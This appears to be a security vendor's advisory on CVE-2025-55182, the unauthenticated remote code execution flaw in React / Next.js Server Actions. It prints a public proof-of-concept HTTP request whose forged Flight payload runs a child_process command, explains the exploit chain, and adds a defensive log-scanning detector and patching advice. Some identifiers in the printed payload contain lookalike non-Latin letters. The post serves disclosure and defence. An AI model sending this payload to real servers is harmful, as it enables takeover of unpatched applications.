Hacker maple3142 published a working Proof of Concept for CVE-2025-55182 which we successfully verified
This research on CVE-2025-55182 was published by the OX research team on Dec 5, 2025.
TL;DR
Just two days after we published our initial analysis of the React / Next.js server-side RCE vulnerability (CVE-2025-55182), a fully functional exploit has been released publicly. The PoC works exactly as expected and results in unauthenticated remote code execution on vulnerable servers.
Reminder: On Wednesday, Dec 3, a critical vulnerability was discovered in React, allowing attackers to execute code on vulnerable servers without any authentication, potentially exposing millions of applications to immediate risk. React is one of the most popular JavaScript libraries for building user interfaces, created by Facebook (Meta), with over 1.97 billion total downloads.
A working proof of concept (PoC) for exploiting CVE-2025-55182 on Next.js 16.0.6
The exploit abuses React’s $@ deserialization to forge a Chunk object and force execution of internal resolution logic on attacker-controlled data.
By hijacking Blob deserialization so that response._formData.get points to the Function constructor, attacker-supplied code is returned and executed, resulting in full remote code execution on the server.
This payload abuses React's $@ deserialization to forge a resolved internal Chunk by combining "then":"$1:__proto__:then" with "status":"resolved_model", forcing React to invoke a then handler supplied by the attacker. The _response object is fully controlled: _formData.get is redirected to the Function constructor via "$1:constructor:constructor", while _prefix holds the attacker's JavaScript code (process.mainModule.require('child_process').execSynс('calс')). When React reaches the Blob deserialization path, it evaluates response._formData.get(response._prefix), which becomes Function(attacker_code) and returns a new function. That returned function is then executed through the manipulated then resolution flow, resulting in server-side remote code execution.
Credit to maple3142 for the great work.
Link to original work: https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
PoC:
POST / HTTP/1.1
Host: e57c9a8b480c.ngrok-free.app
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 458
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSynс('calc');","_formDatа":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
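The request above has a recognisable shape that a defender can look for in logs or at a reverse proxy before the patched versions are rolled out: a multipart Server Action body whose JSON fields contain Flight reference strings that walk "__proto__" or "constructor" chains, together with React-internal chunk fields such as _response, _formData and status. The following detector is an added example written for this post, not code from maple3142's gist or from React; it uses a constructed sample body in which the command string is replaced by a placeholder, and the boundary string, key lists and function names are my own assumptions. It flags the structural pattern only and runs offline.

```python
import json
import re
from typing import Any, Iterator

# Constructed sample body (not the original PoC): same structure as the request
# discussed above, with the attacker's JavaScript replaced by a placeholder.
BOUNDARY = "----WebKitFormBoundaryEXAMPLE"
SUSPICIOUS_REQUEST_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="0"\r\n\r\n'
    '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
    '"value":"{\\"then\\":\\"$B1337\\"}",'
    '"_response":{"_prefix":"PLACEHOLDER_CODE",'
    '"_formData":{"get":"$1:constructor:constructor"}}}\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="1"\r\n\r\n'
    '"$@0"\r\n'
    f"--{BOUNDARY}--\r\n"
)

# Constructed benign Server Action body: ordinary arguments, no Flight references.
BENIGN_REQUEST_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="0"\r\n\r\n'
    '["hello",{"count":3}]\r\n'
    f"--{BOUNDARY}--\r\n"
)

# Property segments that should never appear in a client-supplied reference path.
DANGEROUS_SEGMENTS = {"__proto__", "constructor", "prototype"}
# Field names that belong to React's internal Chunk/Response objects, not to user data.
INTERNAL_KEYS = {"_response", "_formData", "_prefix", "_chunks", "status", "reason"}


def parse_multipart(body: str, boundary: str) -> dict[str, str]:
    """Minimal multipart/form-data splitter: returns {field name: raw value}."""
    fields: dict[str, str] = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble or closing delimiter
            continue
        header_blob, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]*)"', header_blob)
        if match:
            fields[match.group(1)] = value
    return fields


def walk(obj: Any, path: str) -> Iterator[tuple[str, Any]]:
    """Yield (json-path, node) for every node, descending into JSON-encoded strings too."""
    yield path, obj
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from walk(val, f"{path}.{key}")
    elif isinstance(obj, list):
        for idx, val in enumerate(obj):
            yield from walk(val, f"{path}[{idx}]")
    elif isinstance(obj, str) and obj[:1] in ("{", "["):
        try:                                  # nested model, e.g. the "value" field
            yield from walk(json.loads(obj), f"{path}(json)")
        except json.JSONDecodeError:
            pass


def inspect_node(node: Any, path: str) -> list[str]:
    """Return findings for one node: dangerous reference paths or React-internal fields."""
    findings: list[str] = []
    if isinstance(node, str) and node.startswith("$") and ":" in node:
        # "$<id>:<prop>:<prop>" - drop the id, keep the property path being walked
        segments = node[1:].split(":")[1:]
        hits = DANGEROUS_SEGMENTS.intersection(segments)
        if hits:
            findings.append(f"{path}: reference walks {sorted(hits)} in {node!r}")
    if isinstance(node, dict):
        present = INTERNAL_KEYS.intersection(node)
        forged_chunk = "status" in present and "then" in node
        if "_response" in present or "_formData" in present or forged_chunk:
            findings.append(f"{path}: object carries React-internal chunk fields {sorted(present)}")
    return findings


def scan_server_action_body(body: str, boundary: str) -> list[str]:
    """Scan every JSON field of a Server Action request; empty list means nothing suspicious."""
    findings: list[str] = []
    for name, raw in parse_multipart(body, boundary).items():
        try:
            model = json.loads(raw)
        except json.JSONDecodeError:
            continue                          # non-JSON fields (files) are out of scope here
        for path, node in walk(model, f"field[{name}]"):
            findings.extend(inspect_node(node, path))
    return findings


if __name__ == "__main__":
    for line in scan_server_action_body(SUSPICIOUS_REQUEST_BODY, BOUNDARY):
        print("ALERT", line)
    print("benign findings:", scan_server_action_body(BENIGN_REQUEST_BODY, BOUNDARY))
```

Run it once to see the four findings on the constructed sample: the top-level object and its _response child are flagged for carrying internal chunk fields, and the "then" and "_formData.get" strings are flagged for walking __proto__ and constructor. Matching on the reference grammar rather than on a specific command string is deliberate, since the command portion is the part an attacker varies most freely; a rule like this belongs in front of the application as a stop-gap, and the actual fix is upgrading to a patched React / Next.js release.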
What Can You Do?
We were able to find a PoC online and weaponize it just two days after the initial CVE publication. This shows that the vulnerability is not merely theoretical but highly risky in practice, and it should be patched immediately on your internet-facing services.
For more details about the origin of the vulnerability and how to protect yourself, refer to our original blog post.
Worried your environment was exposed by CVE-2025-55182 or CVE-2025-66478?
Contact us to validate your exposure and understand the impact.